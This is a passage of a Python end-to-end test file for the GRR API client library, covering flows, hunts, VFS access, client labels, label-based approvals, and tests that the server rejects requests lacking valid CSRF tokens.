result_flow = self.api.Client(client_id=client_urn.Basename()).Flow(
flow_urn.Basename())
results = list(result_flow.ListResults())
self.assertEqual(len(results), 1)
self.assertEqual(process.AsPrimitiveProto(), results[0].payload)
def testWaitUntilDoneReturnsWhenFlowCompletes(self):
client_urn = self.SetupClients(1)[0]
flow_urn = flow.GRRFlow.StartFlow(
client_id=client_urn,
flow_name=processes.ListProcesses.__name__,
token=self.token)
result_flow = self.api.Client(client_id=client_urn.Basename()).Flow(
flow_urn.Basename()).Get()
self.assertEqual(result_flow.data.state, result_flow.data.RUNNING)
def ProcessFlow():
time.sleep(1)
client_mock = processes_test.ListProcessesMock([])
for _ in flow_test_lib.TestFlowHelper(
flow_urn, client_mock, client_id=client_urn, token=self.token):
pass
threading.Thread(target=ProcessFlow).start()
f = result_flow.WaitUntilDone()
self.assertEqual(f.data.state, f.data.TERMINATED)
def testWaitUntilDoneRaisesWhenFlowFails(self):
client_urn = self.SetupClients(1)[0]
flow_urn = flow.GRRFlow.StartFlow(
client_id=client_urn,
flow_name=processes.ListProcesses.__name__,
token=self.token)
result_flow = self.api.Client(client_id=client_urn.Basename()).Flow(
flow_urn.Basename()).Get()
def ProcessFlow():
time.sleep(1)
with aff4.FACTORY.Open(flow_urn, mode="rw", token=self.token) as fd:
fd.GetRunner().Error("")
threading.Thread(target=ProcessFlow).start()
with self.assertRaises(grr_api_errors.FlowFailedError):
result_flow.WaitUntilDone()
def testWaitUntilDoneRasiesWhenItTimesOut(self):
client_urn = self.SetupClients(1)[0]
flow_urn = flow.GRRFlow.StartFlow(
client_id=client_urn,
flow_name=processes.ListProcesses.__name__,
token=self.token)
result_flow = self.api.Client(client_id=client_urn.Basename()).Flow(
flow_urn.Basename()).Get()
with self.assertRaises(grr_api_errors.PollTimeoutError):
with utils.Stubber(grr_api_utils, "DEFAULT_POLL_TIMEOUT", 1):
result_flow.WaitUntilDone()
class ApiClientLibHuntTest(ApiE2ETest, standard_test.StandardHuntTestMixin):
"""Tests flows-related part of GRR Python API client library."""
def setUp(self):
super(ApiClientLibHuntTest, self).setUp()
self.hunt_obj = self.CreateHunt()
def testListHunts(self):
hs = list(self.api.ListHunts())
self.assertEqual(len(hs), 1)
self.assertEqual(hs[0].hunt_id, self.hunt_obj.urn.Basename())
self.assertEqual(hs[0].data.name, "GenericHunt")
def testGetHunt(self):
h = self.api.Hunt(self.hunt_obj.urn.Basename()).Get()
self.assertEqual(h.hunt_id, self.hunt_obj.urn.Basename())
self.assertEqual(h.data.name, "GenericHunt")
def testModifyHunt(self):
h = self.api.Hunt(self.hunt_obj.urn.Basename()).Get()
self.assertEqual(h.data.client_limit, 100)
h = h.Modify(client_limit=200)
self.assertEqual(h.data.client_limit, 200)
h = self.api.Hunt(self.hunt_obj.urn.Basename()).Get()
self.assertEqual(h.data.client_limit, 200)
def testDeleteHunt(self):
self.api.Hunt(self.hunt_obj.urn.Basename()).Delete()
obj = aff4.FACTORY.Open(self.hunt_obj.urn, token=self.token)
self.assertEqual(obj.__class__, aff4.AFF4Volume)
def testStartHunt(self):
h = self.api.Hunt(self.hunt_obj.urn.Basename()).Get()
self.assertEqual(h.data.state, h.data.PAUSED)
h = h.Start()
self.assertEqual(h.data.state, h.data.STARTED)
h = self.api.Hunt(self.hunt_obj.urn.Basename()).Get()
self.assertEqual(h.data.state, h.data.STARTED)
def testStopHunt(self):
hunt_urn = self.StartHunt()
h = self.api.Hunt(hunt_urn.Basename()).Get()
self.assertEqual(h.data.state, h.data.STARTED)
h = h.Stop()
self.assertEqual(h.data.state, h.data.STOPPED)
h = self.api.Hunt(hunt_urn.Basename()).Get()
self.assertEqual(h.data.state, h.data.STOPPED)
def testListResults(self):
self.client_ids = self.SetupClients(5)
with test_lib.FakeTime(42):
hunt_urn = self.StartHunt()
self.AssignTasksToClients()
self.RunHunt(failrate=-1)
h = self.api.Hunt(hunt_urn.Basename()).Get()
results = list(h.ListResults())
client_ids = set(r.client.client_id for r in results)
self.assertEqual(client_ids, set(x.Basename() for x in self.client_ids))
for r in results:
self.assertEqual(r.timestamp, 42000000)
self.assertEqual(r.payload.pathspec.path, "/tmp/evil.txt")
def testListLogsWithoutClientIds(self):
self.hunt_obj.Log("Sample message: foo.")
self.hunt_obj.Log("Sample message: bar.")
logs = list(self.api.Hunt(self.hunt_obj.urn.Basename()).ListLogs())
self.assertEqual(len(logs), 2)
self.assertEqual(logs[0].client, None)
self.assertEqual(logs[0].data.log_message, "Sample message: foo.")
self.assertEqual(logs[1].client, None)
self.assertEqual(logs[1].data.log_message, "Sample message: bar.")
def testListLogsWithClientIds(self):
self.client_ids = self.SetupClients(2)
hunt_urn = self.StartHunt()
self.AssignTasksToClients()
self.RunHunt(failrate=-1)
logs = list(self.api.Hunt(hunt_urn.Basename()).ListLogs())
client_ids = set()
for l in logs:
client_ids.add(l.client.client_id)
self.assertEqual(client_ids, set(x.Basename() for x in self.client_ids))
def testListErrors(self):
client_urn_1 = rdf_client.ClientURN("C.0000111122223333")
with test_lib.FakeTime(52):
self.hunt_obj.LogClientError(client_urn_1, "Error foo.")
client_urn_2 = rdf_client.ClientURN("C.1111222233334444")
with test_lib.FakeTime(55):
self.hunt_obj.LogClientError(client_urn_2, "Error bar.",
"<some backtrace>")
errors = list(self.api.Hunt(self.hunt_obj.urn.Basename()).ListErrors())
self.assertEqual(len(errors), 2)
self.assertEqual(errors[0].log_message, "Error foo.")
self.assertEqual(errors[0].client.client_id, client_urn_1.Basename())
self.assertEqual(errors[0].backtrace, "")
self.assertEqual(errors[1].log_message, "Error bar.")
self.assertEqual(errors[1].client.client_id, client_urn_2.Basename())
self.assertEqual(errors[1].backtrace, "<some backtrace>")
def testListCrashes(self):
self.hunt_obj.Run()
client_ids = self.SetupClients(2)
client_mocks = dict([(client_id,
flow_test_lib.CrashClientMock(client_id, self.token))
for client_id in client_ids])
self.AssignTasksToClients(client_ids)
hunt_test_lib.TestHuntHelperWithMultipleMocks(client_mocks, False,
self.token)
crashes = list(self.api.Hunt(self.hunt_obj.urn.Basename()).ListCrashes())
self.assertEqual(len(crashes), 2)
self.assertEqual(
set(x.client.client_id for x in crashes),
set(x.Basename() for x in client_ids))
for c in crashes:
self.assertEqual(c.crash_message, "Client killed during transaction")
def testListClients(self):
self.hunt_obj.Run()
client_ids = self.SetupClients(5)
self.AssignTasksToClients(client_ids=client_ids)
self.RunHunt(client_ids=[client_ids[-1]], failrate=0)
h = self.api.Hunt(self.hunt_obj.urn.Basename())
clients = list(h.ListClients(h.CLIENT_STATUS_STARTED))
self.assertEqual(len(clients), 5)
clients = list(h.ListClients(h.CLIENT_STATUS_OUTSTANDING))
self.assertEqual(len(clients), 4)
clients = list(h.ListClients(h.CLIENT_STATUS_COMPLETED))
self.assertEqual(len(clients), 1)
self.assertEqual(clients[0].client_id, client_ids[-1].Basename())
def testGetClientCompletionStats(self):
self.hunt_obj.Run()
client_ids = self.SetupClients(5)
self.AssignTasksToClients(client_ids=client_ids)
client_stats = self.api.Hunt(
self.hunt_obj.urn.Basename()).GetClientCompletionStats()
self.assertEqual(len(client_stats.start_points), 0)
self.assertEqual(len(client_stats.complete_points), 0)
def testGetStats(self):
self.client_ids = self.SetupClients(5)
self.hunt_obj.Run()
self.AssignTasksToClients()
self.RunHunt(failrate=-1)
stats = self.api.Hunt(self.hunt_obj.urn.Basename()).GetStats()
self.assertEqual(len(stats.worst_performers), 5)
def testGetFilesArchive(self):
zip_stream = StringIO.StringIO()
self.api.Hunt(self.hunt_obj.urn.Basename()).GetFilesArchive().WriteToStream(
zip_stream)
zip_fd = zipfile.ZipFile(zip_stream)
namelist = zip_fd.namelist()
self.assertTrue(namelist)
def testExportedResults(self):
zip_stream = StringIO.StringIO()
self.api.Hunt(self.hunt_obj.urn.Basename()).GetExportedResults(
csv_plugin.CSVInstantOutputPlugin.plugin_name).WriteToStream(zip_stream)
zip_fd = zipfile.ZipFile(zip_stream)
namelist = zip_fd.namelist()
self.assertTrue(namelist)
class ApiClientLibVfsTest(ApiE2ETest):
"""Tests VFS operations part of GRR Python API client library."""
def setUp(self):
super(ApiClientLibVfsTest, self).setUp()
self.client_urn = self.SetupClients(1)[0]
fixture_test_lib.ClientFixture(self.client_urn, self.token)
def testGetFileFromRef(self):
file_ref = self.api.Client(
client_id=self.client_urn.Basename()).File("fs/os/c/Downloads/a.txt")
self.assertEqual(file_ref.path, "fs/os/c/Downloads/a.txt")
file_obj = file_ref.Get()
self.assertEqual(file_obj.path, "fs/os/c/Downloads/a.txt")
self.assertFalse(file_obj.is_directory)
self.assertEqual(file_obj.data.name, "a.txt")
def testGetFileForDirectory(self):
file_obj = self.api.Client(
client_id=self.client_urn.Basename()).File("fs/os/c/Downloads").Get()
self.assertEqual(file_obj.path, "fs/os/c/Downloads")
self.assertTrue(file_obj.is_directory)
def testListFiles(self):
files_iter = self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/os/c/Downloads").ListFiles()
files_list = list(files_iter)
self.assertEqual(
sorted(f.data.name for f in files_list),
sorted(
[u"a.txt", u"b.txt", u"c.txt", u"d.txt", u"sub1", u"中国新闻网新闻中.txt"]))
def testGetBlob(self):
out = StringIO.StringIO()
self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/tsk/c/bin/rbash").GetBlob().WriteToStream(out)
self.assertEqual(out.getvalue(), "Hello world")
def testGetBlobUnicode(self):
aff4.FACTORY.Copy("aff4:/C.1000000000000000/fs/tsk/c/bin/bash",
"aff4:/C.1000000000000000/fs/tsk/c/bin/中国新闻网新闻中")
out = StringIO.StringIO()
self.api.Client(client_id=self.client_urn.Basename()).File(
u"fs/tsk/c/bin/中国新闻网新闻中").GetBlob().WriteToStream(out)
self.assertEqual(out.getvalue(), "Hello world")
def testGetFilesArchive(self):
zip_stream = StringIO.StringIO()
self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/tsk/c/bin").GetFilesArchive().WriteToStream(zip_stream)
zip_fd = zipfile.ZipFile(zip_stream)
namelist = zip_fd.namelist()
self.assertEqual(
sorted(namelist),
sorted([
"vfs_C_1000000000000000_fs_tsk_c_bin/fs/tsk/c/bin/rbash",
"vfs_C_1000000000000000_fs_tsk_c_bin/fs/tsk/c/bin/bash"
]))
def testGetVersionTimes(self):
vtimes = self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/os/c/Downloads/a.txt").GetVersionTimes()
self.assertEqual(len(vtimes), 1)
def testRefresh(self):
operation = self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/os/c/Downloads").Refresh()
self.assertTrue(operation.operation_id)
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def testRefreshWaitUntilDone(self):
f = self.api.Client(
client_id=self.client_urn.Basename()).File("fs/os/c/Downloads")
operation = f.Refresh()
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def ProcessOperation():
time.sleep(1)
# We assume that the operation id is the URN of a flow.
for _ in flow_test_lib.TestFlowHelper(
rdfvalue.RDFURN(operation.operation_id),
client_id=self.client_urn,
token=self.token):
pass
threading.Thread(target=ProcessOperation).start()
result_f = operation.WaitUntilDone().target_file
self.assertEqual(f.path, result_f.path)
self.assertEqual(operation.GetState(), operation.STATE_FINISHED)
def testCollect(self):
operation = self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/os/c/Downloads/a.txt").Collect()
self.assertTrue(operation.operation_id)
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def testCollectWaitUntilDone(self):
f = self.api.Client(
client_id=self.client_urn.Basename()).File("fs/os/c/Downloads/a.txt")
operation = f.Collect()
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def ProcessOperation():
time.sleep(1)
# We assume that the operation id is the URN of a flow.
for _ in flow_test_lib.TestFlowHelper(
rdfvalue.RDFURN(operation.operation_id),
client_id=self.client_urn,
token=self.token):
pass
threading.Thread(target=ProcessOperation).start()
result_f = operation.WaitUntilDone().target_file
self.assertEqual(f.path, result_f.path)
self.assertEqual(operation.GetState(), operation.STATE_FINISHED)
def testGetTimeline(self):
timeline = self.api.Client(
client_id=self.client_urn.Basename()).File("fs").GetTimeline()
self.assertTrue(timeline)
for item in timeline:
self.assertTrue(isinstance(item, vfs_pb2.ApiVfsTimelineItem))
def testGetTimelineAsCsv(self):
out = StringIO.StringIO()
self.api.Client(client_id=self.client_urn.Basename()).File(
"fs").GetTimelineAsCsv().WriteToStream(out)
self.assertTrue(out.getvalue())
class ApiClientLibLabelsTest(ApiE2ETest):
"""Tests VFS operations part of GRR Python API client library."""
def setUp(self):
super(ApiClientLibLabelsTest, self).setUp()
self.client_urn = self.SetupClients(1)[0]
def testAddLabels(self):
client_ref = self.api.Client(client_id=self.client_urn.Basename())
self.assertEqual(list(client_ref.Get().data.labels), [])
with test_lib.FakeTime(42):
client_ref.AddLabels(["foo", "bar"])
self.assertEqual(
sorted(client_ref.Get().data.labels, key=lambda l: l.name), [
jobs_pb2.AFF4ObjectLabel(
name="bar", owner=self.token.username, timestamp=42000000),
jobs_pb2.AFF4ObjectLabel(
name="foo", owner=self.token.username, timestamp=42000000)
])
def testRemoveLabels(self):
with test_lib.FakeTime(42):
with aff4.FACTORY.Open(
self.client_urn,
aff4_type=aff4_grr.VFSGRRClient,
mode="rw",
token=self.token) as client_obj:
client_obj.AddLabels(["bar", "foo"])
client_ref = self.api.Client(client_id=self.client_urn.Basename())
self.assertEqual(
sorted(client_ref.Get().data.labels, key=lambda l: l.name), [
jobs_pb2.AFF4ObjectLabel(
name="bar", owner=self.token.username, timestamp=42000000),
jobs_pb2.AFF4ObjectLabel(
name="foo", owner=self.token.username, timestamp=42000000)
])
client_ref.RemoveLabel("foo")
self.assertEqual(
sorted(client_ref.Get().data.labels, key=lambda l: l.name), [
jobs_pb2.AFF4ObjectLabel(
name="bar", owner=self.token.username, timestamp=42000000)
])
class CSRFProtectionTest(ApiE2ETest):
"""Tests GRR's CSRF protection logic for the HTTP API."""
def setUp(self):
super(CSRFProtectionTest, self).setUp()
self.base_url = self.endpoint
def testGETRequestWithoutCSRFTokenAndRequestedWithHeaderSucceeds(self):
response = requests.get(self.base_url + "/api/config")
self.assertEquals(response.status_code, 200)
# Assert XSSI protection is in place.
self.assertEquals(response.text[:5], ")]}'\n")
def testHEADRequestForGETUrlWithoutTokenAndRequestedWithHeaderSucceeds(self):
response = requests.head(self.base_url + "/api/config")
self.assertEquals(response.status_code, 200)
def testHEADRequestNotEnabledForPOSTUrls(self):
response = requests.head(self.base_url + "/api/clients/labels/add")
self.assertEquals(response.status_code, 405)
def testHEADRequestNotEnabledForDeleteUrls(self):
response = requests.head(
self.base_url + "/api/users/me/notifications/pending/0")
self.assertEquals(response.status_code, 405)
def testPOSTRequestWithoutCSRFTokenFails(self):
data = {"client_ids": ["C.0000000000000000"], "labels": ["foo", "bar"]}
response = requests.post(
self.base_url + "/api/clients/labels/add", data=json.dumps(data))
self.assertEquals(response.status_code, 403)
self.assertTrue("CSRF" in response.text)
def testPOSTRequestWithCSRFTokenInCookiesAndNotInHeadersFails(self):
# Fetch csrf token from the cookie set on the main page.
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
data = {"client_ids": ["C.0000000000000000"], "labels": ["foo", "bar"]}
cookies = {"csrftoken": csrf_token}
response = requests.post(
self.base_url + "/api/clients/labels/add",
data=json.dumps(data),
cookies=cookies)
self.assertEquals(response.status_code, 403)
self.assertTrue("CSRF" in response.text)
def testPOSTRequestWithCSRFTokenInHeadersAndCookiesSucceeds(self):
# Fetch csrf token from the cookie set on the main page.
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
headers = {"x-csrftoken": csrf_token}
data = {"client_ids": ["C.0000000000000000"], "labels": ["foo", "bar"]}
cookies = {"csrftoken": csrf_token}
response = requests.post(
self.base_url + "/api/clients/labels/add",
headers=headers,
data=json.dumps(data),
cookies=cookies)
self.assertEquals(response.status_code, 200)
def testPOSTRequestFailsIfCSRFTokenIsExpired(self):
with test_lib.FakeTime(rdfvalue.RDFDatetime().FromSecondsFromEpoch(42)):
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
headers = {"x-csrftoken": csrf_token}
data = {"client_ids": ["C.0000000000000000"], "labels": ["foo", "bar"]}
cookies = {"csrftoken": csrf_token}
response = requests.post(
self.base_url + "/api/clients/labels/add",
headers=headers,
data=json.dumps(data),
cookies=cookies)
self.assertEquals(response.status_code, 200)
# This should still succeed as we use strict check in wsgiapp.py:
# current_time - token_time > CSRF_TOKEN_DURATION.microseconds
with test_lib.FakeTime(rdfvalue.RDFDatetime().FromSecondsFromEpoch(42) +
wsgiapp.CSRF_TOKEN_DURATION.seconds):
response = requests.post(
self.base_url + "/api/clients/labels/add",
headers=headers,
data=json.dumps(data),
cookies=cookies)
self.assertEquals(response.status_code, 200)
with test_lib.FakeTime(rdfvalue.RDFDatetime().FromSecondsFromEpoch(42) +
wsgiapp.CSRF_TOKEN_DURATION.seconds + 1):
response = requests.post(
self.base_url + "/api/clients/labels/add",
headers=headers,
data=json.dumps(data),
cookies=cookies)
self.assertEquals(response.status_code, 403)
self.assertTrue("Expired CSRF token" in response.text)
def testPOSTRequestFailsIfCSRFTokenIsMalformed(self):
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
headers = {"x-csrftoken": csrf_token + "BLAH"}
data = {"client_ids": ["C.0000000000000000"], "labels": ["foo", "bar"]}
cookies = {"csrftoken": csrf_token}
response = requests.post(
self.base_url + "/api/clients/labels/add",
headers=headers,
data=json.dumps(data),
cookies=cookies)
self.assertEquals(response.status_code, 403)
self.assertTrue("Malformed" in response.text)
def testPOSTRequestFailsIfCSRFTokenDoesNotMatch(self):
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
headers = {"x-csrftoken": csrf_token}
data = {"client_ids": ["C.0000000000000000"], "labels": ["foo", "bar"]}
cookies = {"csrftoken": csrf_token}
# This changes the default test username, meaning that encoded CSRF
# token and the token corresponding to the next requests's user won't
# match.
webauth.WEBAUTH_MANAGER.SetUserName("someotheruser")
response = requests.post(
self.base_url + "/api/clients/labels/add",
headers=headers,
data=json.dumps(data),
cookies=cookies)
self.assertEquals(response.status_code, 403)
self.assertTrue("Non-matching" in response.text)
def testDELETERequestWithoutCSRFTokenFails(self):
response = requests.delete(
self.base_url + "/api/users/me/notifications/pending/0")
self.assertEquals(response.status_code, 403)
self.assertTrue("CSRF" in response.text)
def testDELETERequestWithCSRFTokenInCookiesAndNotInHeadersFails(self):
# Fetch csrf token from the cookie set on the main page.
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
cookies = {"csrftoken": csrf_token}
response = requests.delete(
self.base_url + "/api/users/me/notifications/pending/0",
cookies=cookies)
self.assertEquals(response.status_code, 403)
self.assertTrue("CSRF" in response.text)
def testDELETERequestWithCSRFTokenInCookiesAndHeadersSucceeds(self):
# Fetch csrf token from the cookie set on the main page.
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
headers = {"x-csrftoken": csrf_token}
cookies = {"csrftoken": csrf_token}
response = requests.delete(
self.base_url + "/api/users/me/notifications/pending/0",
headers=headers,
cookies=cookies)
self.assertEquals(response.status_code, 200)
def testPATCHRequestWithoutCSRFTokenFails(self):
response = requests.patch(self.base_url + "/api/hunts/H:123456")
self.assertEquals(response.status_code, 403)
self.assertTrue("CSRF" in response.text)
def testPATCHRequestWithCSRFTokenInCookiesAndNotInHeadersFails(self):
# Fetch csrf token from the cookie set on the main page.
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
cookies = {"csrftoken": csrf_token}
response = requests.patch(
self.base_url + "/api/hunts/H:123456", cookies=cookies)
self.assertEquals(response.status_code, 403)
self.assertTrue("CSRF" in response.text)
def testPATCHRequestWithCSRFTokenInCookiesAndHeadersSucceeds(self):
# Fetch csrf token from the cookie set on the main page.
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
headers = {"x-csrftoken": csrf_token}
cookies = {"csrftoken": csrf_token}
response = requests.patch(
self.base_url + "/api/hunts/H:123456", headers=headers, cookies=cookies)
# We consider 404 to be a normal response here.
# Hunt H:123456 doesn't exist.
self.assertEquals(response.status_code, 404)
def testCSRFTokenIsUpdatedIfNotPresentInCookies(self):
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
self.assertTrue(csrf_token)
# Check that calling GetGrrUser method doesn't update the cookie.
get_user_response = requests.get(self.base_url + "/api/users/me")
csrf_token_2 = get_user_response.cookies.get("csrftoken")
self.assertTrue(csrf_token_2)
self.assertNotEqual(csrf_token, csrf_token_2)
def testCSRFTokenIsNotUpdtedIfUserIsUnknown(self):
fake_manager = webauth.NullWebAuthManager()
fake_manager.SetUserName("")
with utils.Stubber(webauth, "WEBAUTH_MANAGER", fake_manager):
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
self.assertIsNone(csrf_token)
def testGetPendingUserNotificationCountMethodRefreshesCSRFToken(self):
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
# Check that calling GetGrrUser method doesn't update the cookie.
get_user_response = requests.get(
self.base_url + "/api/users/me", cookies={
"csrftoken": csrf_token
})
csrf_token_2 = get_user_response.cookies.get("csrftoken")
self.assertIsNone(csrf_token_2)
# Check that calling GetPendingUserNotificationsCount refreshes the
# token.
notifications_response = requests.get(
self.base_url + "/api/users/me/notifications/pending/count",
cookies={
"csrftoken": csrf_token
})
csrf_token_3 = notifications_response.cookies.get("csrftoken")
self.assertTrue(csrf_token_3)
self.assertNotEqual(csrf_token, csrf_token_3)
class ApiClientLibApprovalsTest(ApiE2ETest,
standard_test.StandardHuntTestMixin):
def setUp(self):
super(ApiClientLibApprovalsTest, self).setUp()
cls = (api_call_router_with_approval_checks.ApiCallRouterWithApprovalChecks)
cls.ClearCache()
self.config_overrider = test_lib.ConfigOverrider({
"API.DefaultRouter": cls.__name__
})
self.config_overrider.Start()
# Force creation of new APIAuthorizationManager, so that configuration
# changes are picked up.
api_auth_manager.APIACLInit.InitApiAuthManager()
def tearDown(self):
super(ApiClientLibApprovalsTest, self).tearDown()
self.config_overrider.Stop()
def testCreateClientApproval(self):
client_id = self.SetupClients(1)[0]
approval = self.api.Client(client_id.Basename()).CreateApproval(
reason="blah", notified_users=["foo"])
self.assertEqual(approval.client_id, client_id.Basename())
self.assertEqual(approval.data.subject.client_id, client_id.Basename())
self.assertEqual(approval.data.reason, "blah")
self.assertFalse(approval.data.is_valid)
def testWaitUntilClientApprovalValid(self):
client_id = self.SetupClients(1)[0]
approval = self.api.Client(client_id.Basename()).CreateApproval(
reason="blah", notified_users=["foo"])
self.assertFalse(approval.data.is_valid)
def ProcessApproval():
time.sleep(1)
self.GrantClientApproval(
client_id, self.token.username, reason="blah", approver="foo")
threading.Thread(target=ProcessApproval).start()
result_approval = approval.WaitUntilValid()
self.assertTrue(result_approval.data.is_valid)
def testCreateHuntApproval(self):
h = self.CreateHunt()
approval = self.api.Hunt(h.urn.Basename()).CreateApproval(
reason="blah", notified_users=["foo"])
self.assertEqual(approval.hunt_id, h.urn.Basename())
self.assertEqual(approval.data.subject.hunt_id, h.urn.Basename())
self.assertEqual(approval.data.reason, "blah")
self.assertFalse(approval.data.is_valid)
def testWaitUntilHuntApprovalValid(self):
h = self.CreateHunt()
approval = self.api.Hunt(h.urn.Basename()).CreateApproval(
reason="blah", notified_users=["approver"])
self.assertFalse(approval.data.is_valid)
def ProcessApproval():
time.sleep(1)
self.CreateAdminUser("approver")
approver_token = access_control.ACLToken(username="approver")
security.HuntApprovalGrantor(
subject_urn=h.urn,
reason="blah",
delegate=self.token.username,
token=approver_token).Grant()
ProcessApproval()
threading.Thread(target=ProcessApproval).start()
result_approval = approval.WaitUntilValid()
self.assertTrue(result_approval.data.is_valid)
class ApprovalByLabelE2ETest(ApiE2ETest):
def setUp(self):
super(ApprovalByLabelE2ETest, self).setUp()
# Set up clients and labels before we turn on the FullACM. We need to create
# the client because to check labels the client needs to exist.
client_ids = self.SetupClients(3)
self.client_nolabel = rdf_client.ClientURN(client_ids[0])
self.client_nolabel_id = self.client_nolabel.Basename()
self.client_legal = rdf_client.ClientURN(client_ids[1])
self.client_legal_id = self.client_legal.Basename()
self.client_prod = rdf_client.ClientURN(client_ids[2])
self.client_prod_id = self.client_prod.Basename()
with aff4.FACTORY.Open(
self.client_legal,
aff4_type=aff4_grr.VFSGRRClient,
mode="rw",
token=self.token) as client_obj:
client_obj.AddLabel("legal_approval")
with aff4.FACTORY.Open(
self.client_prod,
aff4_type=aff4_grr.VFSGRRClient,
mode="rw",
token=self.token) as client_obj:
client_obj.AddLabels(["legal_approval", "prod_admin_approval"])
cls = (api_call_router_with_approval_checks.ApiCallRouterWithApprovalChecks)
cls.ClearCache()
self.approver = test_lib.ConfigOverrider({
"API.DefaultRouter":
cls.__name__,
"ACL.approvers_config_file":
os.path.join(self.base_path, "approvers.yaml")
})
self.approver.Start()
# Get a fresh approval manager object and reload with test approvers.
self.approval_manager_stubber = utils.Stubber(
client_approval_auth, "CLIENT_APPROVAL_AUTH_MGR",
client_approval_auth.ClientApprovalAuthorizationManager())
self.approval_manager_stubber.Start()
# Force creation of new APIAuthorizationManager, so that configuration
# changes are picked up.
api_auth_manager.APIACLInit.InitApiAuthManager()
def tearDown(self):
super(ApprovalByLabelE2ETest, self).tearDown()
self.approval_manager_stubber.Stop()
self.approver.Stop()
def testClientNoLabels(self):
self.assertRaises(grr_api_errors.AccessForbiddenError,
self.api.Client(
self.client_nolabel_id).File("fs/os/foo").Get)
# approvers.yaml rules don't get checked because this client has no
# labels. Regular approvals still required.
self.RequestAndGrantClientApproval(self.client_nolabel, self.token)
# Check we now have access
self.api.Client(self.client_nolabel_id).File("fs/os/foo").Get()
def testClientApprovalSingleLabel(self):
"""Client requires an approval from a member of "legal_approval"."""
self.assertRaises(grr_api_errors.AccessForbiddenError,
self.api.Client(
self.client_legal_id).File("fs/os/foo").Get)
self.RequestAndGrantClientApproval(self.client_legal, self.token)
# This approval isn't enough, we need one from legal, so it should still
# fail.
self.assertRaises(grr_api_errors.AccessForbiddenError,
self.api.Client(
self.client_legal_id).File("fs/os/foo").Get)
# Grant an approval from a user in the legal_approval list in
# approvers.yaml
self.GrantClientApproval(
self.client_legal,
self.token.username,
reason=self.token.reason,
approver="legal1")
# Check we now have access
self.api.Client(self.client_legal_id).File("fs/os/foo").Get()
def testClientApprovalMultiLabel(self):
"""Multi-label client approval test.
This client requires one legal and two prod admin approvals. The requester
must also be in the prod admin group.
"""
self.token.username = "prod1"
webauth.WEBAUTH_MANAGER.SetUserName(self.token.username)
# No approvals yet, this should fail.
self.assertRaises(grr_api_errors.AccessForbiddenError,
self.api.Client(
self.client_prod_id).File("fs/os/foo").Get)
self.RequestAndGrantClientApproval(self.client_prod, self.token)
# This approval from "approver" isn't enough.
self.assertRaises(grr_api_errors.AccessForbiddenError,
self.api.Client(
self.client_prod_id).File("fs/os/foo").Get)
# Grant an approval from a user in the legal_approval list in
# approvers.yaml
self.GrantClientApproval(
self.client_prod,
self.token.username,
reason=self.token.reason,
approver="legal1")
# We have "approver", "legal1": not enough.
self.assertRaises(grr_api_errors.AccessForbiddenError,
self.api.Client(
self.client_prod_id).File("fs/os/foo").Get)
# Grant an approval from a user in the prod_admin_approval list in
# approvers.yaml
self.GrantClientApproval(
self.client_prod,
self.token.username,
reason=self.token.reason,
approver="prod2")
# We have "approver", "legal1", "prod2": not enough.
self.assertRaises(grr_api_errors.AccessForbiddenError,
self.api.Client(
self.client_prod_id).File("fs/os/foo").Get)
self.GrantClientApproval(
self.client_prod,
self.token.username,
reason=self.token.reason,
approver="prod3")
# We have "approver", "legal1", "prod2", "prod3": we should have
# access.
self.api.Client(self.client_prod_id).File("fs/os/foo").Get()
def testClientApprovalMultiLabelCheckRequester(self):
"""Requester must be listed as prod_admin_approval in approvals.yaml."""
# No approvals yet, this should fail.
self.assertRaises(grr_api_errors.AccessForbiddenError,
self.api.Client(
self.client_prod_id).File("fs/os/foo").Get)
# Grant all the necessary approvals
self.RequestAndGrantClientApproval(self.client_prod, self.token)
self.GrantClientApproval(
self.client_prod,
self.token.username,
reason=self.token.reason,
approver="legal1")
self.GrantClientApproval(
self.client_prod,
self.token.username,
reason=self.token.reason,
approver="prod2")
self.GrantClientApproval(
self.client_prod,
self.token.username,
reason=self.token.reason,
approver="prod3")
# We have "approver", "legal1", "prod2", "prod3" approvals but because
# "notprod" user isn't in prod_admin_approval and
# requester_must_be_authorized is True it should still fail. This user can
# never get a complete approval.
self.assertRaises(grr_api_errors.AccessForbiddenError,
self.api.Client(
self.client_prod_id).File("fs/os/foo").Get)
class RootApiUserManagementTest(ApiE2ETest):
"""E2E test for root API user management calls."""
def setUp(self):
super(RootApiUserManagementTest, self).setUp()
self.config_overrider = test_lib.ConfigOverrider({
"API.DefaultRouter": api_root_router.ApiRootRouter.__name__
})
self.config_overrider.Start()
# Force creation of new APIAuthorizationManager, so that configuration
# changes are picked up.
api_auth_manager.APIACLInit.InitApiAuthManager()
def tearDown(self):
super(RootApiUserManagementTest, self).tearDown()
self.config_overrider.Stop()
def testStandardUserIsCorrectlyAdded(self):
user = self.api.root.CreateGrrUser(username="user_foo")
self.assertEqual(user.username, "user_foo")
self.assertEqual(user.data.username, "user_foo")
self.assertEqual(user.data.user_type, user.USER_TYPE_STANDARD)
def testAdminUserIsCorrectlyAdded(self):
user = self.api.root.CreateGrrUser(
username="user_foo", user_type=grr_api_root.GrrUser.USER_TYPE_ADMIN)
self.assertEqual(user.username, "user_foo")
self.assertEqual(user.data.username, "user_foo")
